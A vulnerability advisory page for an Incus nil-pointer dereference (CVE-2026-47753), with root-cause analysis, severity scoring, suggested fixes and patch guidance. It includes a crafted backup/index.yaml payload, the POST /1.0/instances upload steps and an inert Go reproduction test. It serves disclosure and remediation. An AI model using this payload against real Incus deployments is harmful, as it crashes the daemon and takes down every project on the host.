Incus CVE-2026-47753
MEDIUMSeverity by source
Network-reachable REST API, minimal complexity, low-privilege authentication required (PR:L), no user interaction, and pure availability impact via unrecovered daemon crash.
Estimated by vuln.today — no official severity rating has been published for this CVE yet.
Lifecycle Timeline
2DescriptionCVE.org
Summary
(*backend).CreateInstanceFromBackup in internal/server/storage/backend.go contains a nil-pointer dereference that an authenticated user with permission to create instances in any project can trigger remotely by uploading a crafted backup tarball. The Incus daemon panics and the process crashes, causing denial of service to every project on that cluster member.
This is a sibling of GHSA-fwj8-62r8-8p8m, GHSA-r7w7-mmxr-47r9, and GHSA-x5r6-jr56-89pv (all assigned 2026-05-04). Those patches added guards on adjacent fields of the same backup/config.Config struct; the Volume field on the instance-import path was missed.
Vulnerable code
internal/server/storage/backend.go (current main, commit 1513600):
// Lines 763-767 - properly guarded:
var volumeConfig map[string]string
if srcBackup.Config != nil && srcBackup.Config.Volume != nil {
volumeConfig = srcBackup.Config.Volume.Config
}
// ... a few lines later ...
// Line 795 - unguarded, dereferences Config.Volume directly:
if srcBackup.Config.Volume.Config["block.type"] == drivers.BlockVolumeTypeQcow2 {The caller createFromBackup in cmd/incusd/instances_post.go only verifies that Config and Config.Container are non-nil:
// instances_post.go:854
if bInfo.Config == nil || bInfo.Config.Container == nil {
return response.BadRequest(errors.New("Backup file is missing required information"))
}Volume is not checked. The Volume field on internal/server/backup/config.Config has type *api.StorageVolume with yaml:"volume,omitempty", so omitting volume: from a crafted backup/index.yaml decodes to nil. The subsequent unguarded deref on line 795 panics.
The panic happens on the HTTP request goroutine; no recover() is installed by CreateInstanceFromBackup or its callers, so the Go runtime kills the entire incusd process.
Reach
- The attacker is any client authenticated to the Incus REST API (TLS client certificate, OIDC, or unix socket) with permission to create instances in at least one project. This is the most common low-trust authenticated user.
- The attacker sends
POST /1.0/instances?project=<p>withContent-Type: application/octet-stream. - The body is an uncompressed tar (the same code path also accepts squashfs / gz / zstd / xz) containing one file,
backup/index.yaml, whoseconfig:block listscontainer:andpool:but omitsvolume:. cmd/incusd/instances_post.goinstancesPost->createFromBackup-> the line 854 guard passes (Container is non-nil) ->pool.CreateInstanceFromBackup(*bInfo, backupFile, nil)->internal/server/storage/backend.go:795panics onsrcBackup.Config.Volume.Config[...].incusdprocess dies. All running operations on that cluster member are killed. Repeated requests = persistent denial of service.
Minimal crafted backup/index.yaml:
name: poc
backend: dir
pool: default
type: container
optimized: false
optimized_header: false
config:
container:
name: poc
architecture: x86_64
type: container
pool:
name: default
driver: dir
# volume intentionally absentProof of concept
A self-contained Go unit test imports the real internal/server/backup/config package, decodes the crafted YAML into the actual *backupConfig.Config struct used by the daemon, and executes the literal expression from backend.go:795. The test is intentionally inert (panics are recovered and reported as the expected outcome):
// internal/poc_repro/poc_nil_deref_volume_test.go
func TestPoCNilDerefVolumeImport(t *testing.T) {
var bi pocInfo // mirrors internal/server/backup.Info, only Config is needed
loader, _ := yaml.NewLoader(strings.NewReader(evilIndex))
_ = loader.Load(&bi)
// bi.Config != nil, bi.Config.Container != nil (passes createFromBackup guard)
// bi.Config.Volume == nil (passes the line 765 guard's else branch)
defer func() { _ = recover() }()
// Literal copy of backend.go:795.
if bi.Config.Volume.Config["block.type"] == "qcow2" {
// unreachable
}
}Result against lxc/incus@1513600 on Go 1.26.1:
=== RUN TestPoCNilDerefVolumeImport
poc_nil_deref_volume_test.go:97: yaml decoded: Container != nil (passes createFromBackup guard), Volume == nil
poc_nil_deref_volume_test.go:99: backend.go line 795 unguarded deref about to execute...
poc_nil_deref_volume_test.go:123: CONFIRMED: nil-pointer panic at the exact line as backend.go:795 => runtime error: invalid memory address or nil pointer dereference
--- PASS: TestPoCNilDerefVolumeImport (0.00s)A tarball builder + uploader (main.go) is included in the report's PoC bundle. The tarball is 2560 bytes and contains a single 547-byte backup/index.yaml.
Impact
- Severity: denial of service against the entire
incusdprocess. Every container / VM operation on the host (and on the cluster member, if clustered) is aborted; subsequent requests fail until the process is restarted by an operator or supervisor. - Privileges required: authenticated user with
can_createpermission on any project. The path is not behind the admin auth tier. - Network attack surface: the Incus REST API on
:8443(or unix socket). - CWE-476 - nil pointer dereference. CVSS estimate: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
Suggested fix
Mirror the guard already present on line 765 a few lines higher into the path that hits line 795. For example:
if srcBackup.Config == nil || srcBackup.Config.Volume == nil {
return nil, nil, errors.New("Backup config missing required volume metadata")
}
if srcBackup.Config.Volume.Config["block.type"] == drivers.BlockVolumeTypeQcow2 {Alternatively, extend the existing createFromBackup precondition in cmd/incusd/instances_post.go:854 to also reject backups missing bInfo.Config.Volume. The latter is the smaller surface change and matches the pattern of CreateBucketFromBackup (backend.go:7848):
if srcBackup.Config == nil || srcBackup.Config.Bucket == nil {
return errors.New("Valid bucket config not found in index")
}Reporter notes
Reported via Privately-Reported Vulnerability against lxc/incus. Reporter: tonghuaroot. The reproducer test is non-destructive (no network, no filesystem mutation beyond the temp directory used by Go's test runner) and recovers the panic.
AnalysisAI
Nil-pointer dereference in Incus daemon (incusd) versions before 7.1.0 allows any authenticated API user holding the standard can_create permission on any project to crash the entire incusd process by uploading a crafted backup tarball, causing denial of service across all projects on the affected cluster member. The vulnerable path in internal/server/storage/backend.go:795 dereferences Config.Volume without a nil guard while adjacent fields received nil-checks in sibling patches (GHSA-fwj8-62r8-8p8m, GHSA-r7w7-mmxr-47r9, GHSA-x5r6-jr56-89pv) released 2026-05-04. Publicly available exploit code exists in the form of a self-contained Go unit test and 2560-byte tarball builder included with the disclosure; no CISA KEV listing at time of analysis.
Technical ContextAI
Incus is a Go-based container and virtual machine manager (pkg:go/github.com_lxc_incus_v7). The backup/config.Config struct carries a Volume field of type *api.StorageVolume tagged yaml:"volume,omitempty"; when this key is absent from a submitted backup/index.yaml, the YAML decoder sets Volume to nil. The caller createFromBackup in cmd/incusd/instances_post.go validates Config and Config.Container at line 854 but never checks Config.Volume. Several lines later in (*backend).CreateInstanceFromBackup at backend.go:795, the expression srcBackup.Config.Volume.Config["block.type"] is evaluated without a nil guard. Because the Go runtime terminates the program on an unrecovered nil-pointer dereference and no recover() is present on this goroutine, the entire incusd process exits. CWE-476 (Null Pointer Dereference) applies precisely. Lines 763-767 of the same function contain a correct guard for the same field on a different code sub-path, demonstrating the fix pattern was already understood but incompletely applied.
RemediationAI
Vendor-released patch: Incus 7.1.0, delivered via commit 98e64f0a6fcfdc9676eea0246418d490c53297bf (https://github.com/lxc/incus/commit/98e64f0a6fcfdc9676eea0246418d490c53297bf); operators should upgrade to 7.1.0 or later immediately, referencing the advisory at https://github.com/lxc/incus/security/advisories/GHSA-8g7m-96c8-8wwc. If immediate upgrade is not feasible, the most targeted compensating control is to block or rate-limit POST /1.0/instances requests carrying Content-Type: application/octet-stream at an API gateway or TLS-terminating reverse proxy in front of port 8443; note this disables legitimate backup-restore operations as a side effect. Alternatively, restricting the can_create permission to fully trusted users eliminates the attack surface without disrupting the API surface, but reduces the multi-tenancy utility of the deployment. Neither workaround addresses the root-cause nil-check gap, so upgrading remains the definitive fix.
Same weakness CWE-476 – NULL Pointer Dereference
View allSame technique Null Pointer Dereference
View allVendor StatusVendor
SUSE
Severity: Moderate| Product | Status |
|---|---|
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Affected |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Affected |
| openSUSE Leap 15.5 | Affected |
| openSUSE Leap 15.6 | Affected |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-8g7m-96c8-8wwc